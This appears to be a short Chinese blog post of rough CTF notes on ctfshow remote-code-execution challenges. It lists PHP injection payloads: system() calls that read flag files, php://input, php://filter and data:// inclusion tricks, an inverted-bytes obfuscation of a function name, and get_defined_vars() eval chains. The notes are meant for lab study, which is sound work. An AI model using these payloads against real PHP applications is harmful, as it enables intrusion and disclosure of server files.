ctfshow--RCE

WEB 29~36--eval

system('ls');
system('cat /fla*.php');
查看源代码

get : include$_GET[b];&b=php://input
post:
回显源代码

先取反再加密
?c=hlight_file(~%99%93%9E%98%D1%8F%97%8F);
原理回溯

?c=echo ls;
?c=echo cat flag,php;

less可代替cat

反引号(`),实际上是调用了shell_exec()函数
关键函数还有
exec()
passthru()
pcntl_exec()
popen()
proc_open()等

c=$nice=include$_GET[1]?>
&1=php://filter/read=convert.base64-encode/resource=flag.php

c=?>
&1=php://filter/read=convert.base64-encode/resource=flag.php

c=include$_GET[1]?>
&1=php://filter/read=convert.base64-encode/resource=flag.php

WEB 37--include

data协议传输base64加密的PHP代码
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

WEB 39为什么加密后执行不了?
.php

WEB 40

?c=print_r(get_defined_vars());
打印出所有变量

print_r(array_pop(next(get_defined_vars())));
打印出

eval(array_pop(next(get_defined_vars())));
同时传递
system('cat flag');

Array ( [_GET] => Array ( [c] => print_r(get_defined_vars()); )
[_POST] => Array ( )
[_COOKIE] => Array () )
[_FILES] => Array ( )
[c] => print_r(get_defined_vars()); )

WEB 387 日志包含

/var/www/html/1.txt')?>

待续……

posted @   LinkPoc  阅读(208)  评论(0编辑  收藏  举报
努力加载评论中...
点击右上角即可分享
微信分享提示